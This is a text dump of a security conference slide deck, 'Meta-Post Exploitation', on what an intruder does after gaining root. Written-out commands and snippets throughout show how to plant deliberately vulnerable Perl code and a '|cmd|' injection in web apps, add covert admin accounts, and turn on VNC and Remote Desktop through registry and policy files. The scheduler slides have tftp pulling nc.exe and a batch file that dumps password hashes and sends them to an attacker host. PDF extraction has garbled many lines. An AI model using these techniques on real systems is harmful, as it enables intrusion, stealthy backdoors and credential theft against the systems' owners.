Meta-Post Exploitation

Using Old, Lost, Forgotten Knowledge

Val Smith ([email protected])

Colin Ames ([email protected])

Slide: 1
Valsmith
– Affiliations:
a o s
• Offensive Computing
• Metasploit
• cDc
– Work:
• Malware Analyst
• Reverse Engineer
• P
Penetration
i TTester
• Exploit developer

Slide: 2
Colin Ames
– Security Researcher, Offensive Computing
– Steganography
g g p y Research
– Penetration Testing
– Reverse Engineering
– Malware Analysis

Slide: 3
• What
Wh t is
i this?
thi ?
– Follow up to Val’s and HD Moore’s
Tactical Exploitation talk from
f last year
– A talk about the use of automation
andd ttactical
ti l ttools
l post-exploitation
t l it ti
– Applied techniques
– Good for LARGE environments
– Different perspectives: some old,
some forgotten, some new

Slide: 4
Post Exploitation Concepts Overview

Slide: 5
Wh t Is
What I Post
P t Exploitation?
E l it ti ?

• It’s what you do after you get root

– Note: This talk assumes you have access
• Includes
– Password Management
– Persistence
– Stealth / Evading Detection
– User Identity Theft
– Feature
eatu e Modification
od cat o
– Automation & Mass 0wnage

Slide: 6
Wh t Is
What I Post
P t Exploitation?
E l it ti ?

• Getting root is just the beginning

– How do you spread?
– How to manage assets as you go along?
• Lots of tools to help you get root:
– Metasploit, Core, Canvas, Stand alone
• But what about after breaking in
– Lots of random tools
– Little automation / standardization
– Archaic, hard to use, poorly documented
– Maliciousness often obvious
– Not Scalable to 1000’s of hosts (ignoring botnets for this talk)
Slide: 7
Password Management

Slide: 8
Wh Password
Why P d Management?
M t?

– Large pentests, 1000’s of passwords

– Testing a cracked password on many
systems can be time consuming
– Keeping track of cracking sessions
– Building and growing your wordlist lets
you crack faster
– Aids in cleanup stage
• Tying accounts to systems

Slide: 9
P
Password
d Management
M t Goals
G l

– Acquired password storage

– Organization and tracking
• What passwords go with which hosts
• What passwords are shared
• Which users have access to what
resources
– Re-use
Re use for further access
– Expanding wordlist for faster
cracking
Slide: 10
Password
P d Management
M t Stages
St
& Techniques

– Acquiring: pwdump, cat /etc/shadow,

cachedump,
h d sqll query, sniffing
iffi
– Decisions: Prioritize accounts to crack
– Cracking: John,
John l0pht,
l0pht Cain
– Tracking: Nothing?
– Reusing:
g Core Impactp

Slide: 11
Manual Password Management

• Existing Tools
– L0phtCrack
• Stores passwords in session files
– Cain&Abel
• Static table, difficult to export / use / automate
• Password Classification (NTLM(NTLM, Cisco
Cisco, SQL
SQL, md5)
– Core Impact
• Good for automated reuse of passwords against many hosts
• No real storage / management capability
– Text file / John the Ripper
• Many people’s method
• Quick and dirty
dirty, not easily scalable

Slide: 12
Slide: 13
• MetaPass
• Demos

Slide: 14
Persistence

Slide: 15
 A word on Stealth vs Persistence

– In
I the
th old
ld d
days a rootkit
tkit h
helped
l d you maintain
i t i roott
– Today rootkits are all about hiding
– These two concepts still go hand in hand

Slide: 16
P i t
Persistence

• Persistence is maintaining access

• Why?
–TTarget’s
t’ can gett patched
t h d
– Some exploits are 1 shot only
– Sometimes you need to return multiple times to the
target
– Target’s usefulness not always immediately known
• Goals:
G l Access
A ttargett as often
ft as needed/useful
d d/ f l
• Huge area of study
• Sometimes
S ti persistence
i t d
doesn’t’t matter
tt
Slide: 17
P i t
Persistence

• Stages of Persistence
– Initial access:
• E
Exploit
l it
• Stolen password, etc.
– Decisions: What tool to use
• FUZZY – OS, Environment, Target dependent
– Setup
– Re-accessing of target
– Cleanup: Don’t be a slob, it will get you caught
• When you no longer need the target
target, leave no trace

Slide: 18
P i t
Persistence

• Existing tools
– Rootkits
– Backdoors
– Trojans
– Port knockers
– Adding accounts
– Things
Thi like
lik netcat
t t backdoors,
b kd inetd
i td
modifications, process injection, stealing
credentials, etc.
Slide: 19
Persistence

• Different perspective on persistence

– If you can always re-exploit who cares
– Inject, add, modify new vulnerabilities
• Hard to determine maliciousness
• We all know its hard to find bugs, now
imagine someone is purposefully
putting the bugs in

Slide: 20
Persistence

• Leveraging existing persistent

admin access
• Nagios
N i checks
h k
• Attack Configuration Management
– Cfengine
g
– SMS
– Automated Patching Systems (“patch”
them with our trojans)
j )
• GUI’s
• Tool distribution

Slide: 21
Persistence

• Example:
• Machine has VNC installed
• Replace installed VNC with vulnerable version
– Authentication bypass
• Copy registry password so target doesn’t realize
• Persistence with no backdoors or rootkits to get
detected

Slide: 22
Persistence

• Add vulnerable code

• Example: web apps
– Take out user input validation
– Inject your vulnerable code
• Focus on vague intent
• Never be obviouslyy and solelyy malicious
– Look for apps with previous vulnerabilities
– Re-introduce patched bugsg

Slide: 23
Persistence

• More web app examples

• Add hidden field to HTML form
– Users detect no change, app performs normally
<input type=“hidden” name=“Lang”>
• Edit web app and tie vuln perl code to form field
input
If defined $hidden_field {
open($filename,”>$hidden_field);
}
• Craft a POST including the hidden field
Slide: 24
Persistence

• www.target.com/cgi-bin/app.cgi?lang=|cmd|
• Code will execute yyour commands
• Who needs to bind a shell to a port?
• Unlikelyy to ever be detected
– Especially good in big apps
– Code review can’t even be sure of maliciousness
– Some sites replace code every X time period
• No rootkits to install
• Tripwire
T i i probably
b bl won’t’t see thi
this
Slide: 25
Persistence

• Take concept to another level

– Add a decoder to web app
– Look for a “trigger” string combination in form
fields
– If Name = John Smith and Age = 42 then execute
contents of Address field
– URL encode form entries containing commands
– Have identifier “stub” in encoded data for app to
find

Slide: 26
Persistence

• Mixing Stealth with Persistence

– Further encoding
– Take entries from all fields
– Concat them
– “Decode” commands
– Rotational Ciphers (rot 13, ceaser)
– Even more complex obfuscation
Slide: 27
Persistence

• Covert Accounts
– Add an account / renable
– Modify local account policies to allow access
• Ex. SUPPORT_3848576b1, guest
– Add it to the admin group (net localgroup)
• Only use AT to run your commands
• Persistence without adding files, new accounts
– Unlikely to be discovered

Slide: 28
• DEMOS

Slide: 29
Stealth / Evading Detection

Slide: 30
Stealth / Evading Detection

• Hiding your activity

– From:
• IDS
• A/V
• LOGGING
• Suspicious users & admins
• Firewalls
• Process listing

Slide: 31
Stealth / Evading Detection

• Why Stealth?
– If yyou g
get caught,
g , yyou g
get stopped
pp
– The longer you can operate undetected, the more you
can accomplish
– Admin’s won’t fix problems they don’t know exist
(helps persistence)
– On a pen test you should also be testing the
organizations detection and response capabilities

Slide: 32
Stealth / Evading Detection

• Goals
– Keep system operable
• If it breaks you can’t use it
• Someone will come fix it
– Operate without fear of detection
– Robustness
• Hiding shouldn’t require constant attention
– DON
DON’T
T LOOK MALICIOUS!
Slide: 33
Stealth / Evading Detection

• Manual / Existing Tools

– Rootkits, rootkits, rootkits
– Meterpreter
– Encryption
• Shellcode Encoders for IDS evasion
– Log cleaners
– Packers
– Covert channels / Steganography
– Anti-analysis / anti-forensics
• See all of OC’s other talks ☺
• Also Vinnie Liu’s Metasploit research

Slide: 34
Stealth / Evading Detection

• Different Perspective
– DON’T BE AN ANOMALY!
– Hide in plain sight
• Many tools have ONLY malicious uses
• Make your intent hard to determine
– Be noisy on one to divert attention from
another

Slide: 35
Stealth / Evading Detection

• Different Perspective
– Know the targets environment better than
they do
• If they
th don’t
d ’t use encryption,
ti maybe
b you shouldn’t
h ld ’t either
ith
• Change strategies to match environment's normal
behavior
– Don’t always default to exploits
• See Tactical Exploitation talk
• IDS
IDS’ss can
can’tt see normal behavior that is malicious

Slide: 36
Stealth / Evading Detection

• Using Windows security objects for stealth

– Auditing of Securable Objects is controlled by
SACL’s
– Null SACL = No Auditing = No Logs

Slide: 37
• DEMOS
– Kaspersky squeals like a pig

Slide: 38
User Identity Theft

Slide: 39
User Identity Theft

• It’s not always about ROOT!

• Look like someone else
– Use the credentials / access of another user
• Goals
– Change your identity at will
• User ID, domain credentials, sessions
• Impersonate system accounts
• Make activities look like normal user behavior

Slide: 40
User Identity Theft

• Stages and techniques

– Target users
• Who has access to what
• Where is the data?
– Change Identity
• Hijack credentials/sessions
• Abuse tokens
– Access is the end goal, be it data or another system

Slide: 41
User Identity Theft

• Existing tools
– Incognito (metasploit)
• Enumerate / hijack tokens
– FU/FUTO
• Enable SYSTEM privileges
• Change process privileges DKOM
– SU / SUDO / KSU
– Process injection
– Hijack
j domain credentials

Slide: 42
User Identity Theft

Tokens, Privileges, Security Descriptors,

SID’s, SACL’s, DACL’s, ACE’s Oh’ My

• What we want
– Privileges or SID’s
SID s
• What we get
– Access,
Access Access,
Access Access
• How we get it
– Incognito vs
vs. FUto
Slide: 43
• DEMOS

Slide: 44
Feature Modification

Slide: 45
Feature Modification

• Changing existing features or settings to

benefit our activities
• Goals
– Support
pp all Post-Exploitation
p activities
– Disabling detection technologies
– Enablingg in-secure or easyy to use access
software

Slide: 46
Feature Modification

• Feature Modification is Basically Securable Object

Manipulation
– Remember all those Tokens
Tokens, and Security Descriptors?
– These can be modified programmatically and directly
• Not just through existing tools
– Stealth / Persistence requirements
• May make it more advantageous to use custom tools
– Access Objects
j p
programmatically
g y
– Can be much more complex to implement

Slide: 47
Feature Modification

• Re-enabling disabled access

– PsExec: It’s still cool (Thanks Mark!)
• Enabling GUI access
– VNC (from a command line)
– Remote
R t DDesktop
kt ((even if di
disabled)
bl d)
• Turning off or adding exceptions to security
software
– Firewalls, AV, logging
• Modifying
y g Local Security
y Policies

Slide: 48
Feature Modification

• Enabling psexec
– Psexec was great,
great awesome remote
shell/command tool
– Everybody now disables clipbook which
psexec requires l4m3
– Lets re-enable
re enable it !

Slide: 49
Feature Modification

• Enabling psexec
y
• Use the system control tool sc.exe
– Net use \\target\ipc$ username /user:password
– Sc \\target config netdde start= auto
– S \\target
Sc \\t t config
fi netddedsdm
tdd d d start=
t t auto
t
– Sc \\target config clipsrv start= auto
– Sc \\
\\target
a ge sstart
a netdde
e dde
– Sc \\target start netddedsdm
– Sc \\target start clipserv

Slide: 50
Feature Modification
• Enabling VNC (from command line)
– Go get VNC (check out guh.nu!)
– Make a folder on the target
g for the vnc files
– Copy the following files to target folder:
• Winvnc.exe
• Vnc.reg Vnc.reg file contents:
• Vnchooks.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
• Omnithread_rt.dll
"SocketConnect"=dword:00000001
"AutoPortSelect"=dword:00000001
– Regedit –s vnc.reg "InputsEnabled"=dword:00000001
"LocalInputsDisabled"=dword:00000000
– Winvncc –install
sa "IdleTimeout"=dword:00000000
"Q
"QuerySetting"=dword:00000002
S tti " d d 00000002
"QueryTimeout"=dword:0000000a
– Net start “vnc server” "PollUnderCursor"=dword:00000000
"PollForeground"=dword:00000001

– Winvnc "PollFullScreen"=dword:00000000
"OnlyPollConsole"=dword:00000001
"OnlyPollOnEvent"=dword:00000000
OnlyPollOnEvent dword:00000000
– Password is “infected” "Password"=hex:10,4d,89,3d,5a,e1,55,f8

Slide: 51
Feature Modification

• Enabling Remote Desktop remotely

– Having a GUI to your target can be necessary
– Maybe they are running a specialized GUI app
• Ex.
Ex System controlling access to security doors
– No command line way of modifying system, need GUI
• SCADA systems?
• Security cameras
• Who knows what you might be up to ☺
– Remote desktop is fast and already a feature of OS
– However it’s often disabled, maybe even by GPO
Slide: 52
Feature Modification
• Enabling Remote Desktop remotely
– Complicated procedure, especially if GPO’s involved
– Create a file named fix_ts_policy.ini
[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Privilege Rights]
seremoteinteractivelogonright = hacked_account
seinteractivelogonright = hacked_account
sedenyinteractivelogonright =
sedenyremoteinteractivelogonright =
sedenynetworklogonright =

– This file will fix policy settings in your way

– Change “hacked_account” to a real account

Slide: 53
Feature Modification
• Enabling Remote Desktop remotely
– Create another file named enable_ts.reg
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]

"fDenyTSConnections"=dword:00000000
"TSEnabled"=dword:00000001
"TSUserEnabled"=dword:00000000

– Then perform these commands

• sc config termservice start= auto
• regedit /s enable_ts.reg
• copy c:\windows\security\database\secedit.sdb c:\windows\security\database\new.secedit.sdb
• copy c:\windows\security\database\secedit.sdb c:\windows\security\database\orig.secedit.sdb
• secedit /configure /db new.secedit.sdb /cfg fix_ts_policy.ini
• gpupdate /Force
• net start "terminal services"
Slide: 54
• DEMOS

Slide: 55
Abusing The Scheduler

Slide: 56
Abusing The Scheduler

• Oldschool techniques can get

results on new problems
• Remember this is POST
exploitation so you already have
some access
• AT command schedules things to
run on at a specified time and
date
– Schedule service must be running

Slide: 57
Abusing The Scheduler

• Often these days certain features are

disabled for security
– Clipbook, shares, enumeration
• Use AT to get around these problems
– Usually NOT disabled

Net use \\target\ipc$ password /user:username

At \\target 12:00 pm command
Ex At \\192.168.1.1
Ex. \\192 168 1 1 12:00pm tftp –II myip GET nc
nc.exe
exe

Slide: 58
Abusing The Scheduler

• Often AT is still enabled while many other

things you typically use are not
• AT is as good as having a shell:
– Enable / Start Services
– Transfer files
– Adding users
– Messing with the registry / policies
– Prettyy much anything
y g yyou can do with a shell
– Added bonus, defaults to run as SYSTEM
Slide: 59
Abusing The Scheduler

• Building a tool around AT

– Flow:
• Establish authenticated session
• Determine the time on the target
• Pass commands to the target to be run 1 min from now
– Write a batch file that executes everything at once
– Have the target send you back whatever info you want
– Be mindful of file transfer protocols, TFTP is good but not
always “quiet” or available

Slide: 60
Abusing The Scheduler

• Common use example

– Nett use \\target
N \\t t
– Net time \\target
– At \\target (net time +1min) “tftp
tftp –ii use GET e
e.bat
bat”
– At \\target (net time +2min) e.bat
– e.bat
e bat does
does:
• Adds a user (net user hacked hacked /add)
– Admin group (net localgroup administrators hacked /add)
• Gets hashdumping tools and dumps hashes
• Sends hashes, identified by IP back to attacker host
Slide: 61
Abusing The Scheduler

• Privileges of LocalSystem that we care about

– NT AUTHORITY\SYSTEM and d
BUILTIN\Administrators SIDs
– SE_IMPERSONATE_NAME
SE IMPERSONATE NAME
– SE_TCB_NAME
– SE_DEBUG_NAME
SE DEBUG NAME

Slide: 62
Massive Automation

Slide: 63
Massive Automation

• Automating techniques and tools for use

against massive numbers of hosts
• Goals
– Penetrate as many systems as possible
with little interaction and in a short time
– Ease of use / re-use
– Lower cost of attack

Slide: 64
Massive Automation

• MassNetUse – Establish netbios

session / credentials on range of hosts
• MassWinenum – Enumerate Netbios
information bypass certain
information,
RestrictAnonymous settings
• AtAbuse – Use the scheduler as your
“shell” to control ranges of hosts

Slide: 65
• DEMOS

Slide: 66
• Related talks you should see
– Beyond EIP – The theoretical / tool
development end of things (spoonm & skape)
– Security Implications of Windows Access
Tokens (Luke Jennings)

Slide: 67
• Acknowledgements
– Thanks to
• All the people from #offensivecomputing, nologin,
uninformed IRC and SILC channels
• HD Moore especially for support and mentorship
• Danny Quist, krbklepto, Egypt, spoonm, skape
• Luke Jennings for his awesome work

Slide: 68
• Questions ?
• Presentation available at
www.offensivecomputing.net
ff i ti t

Slide: 69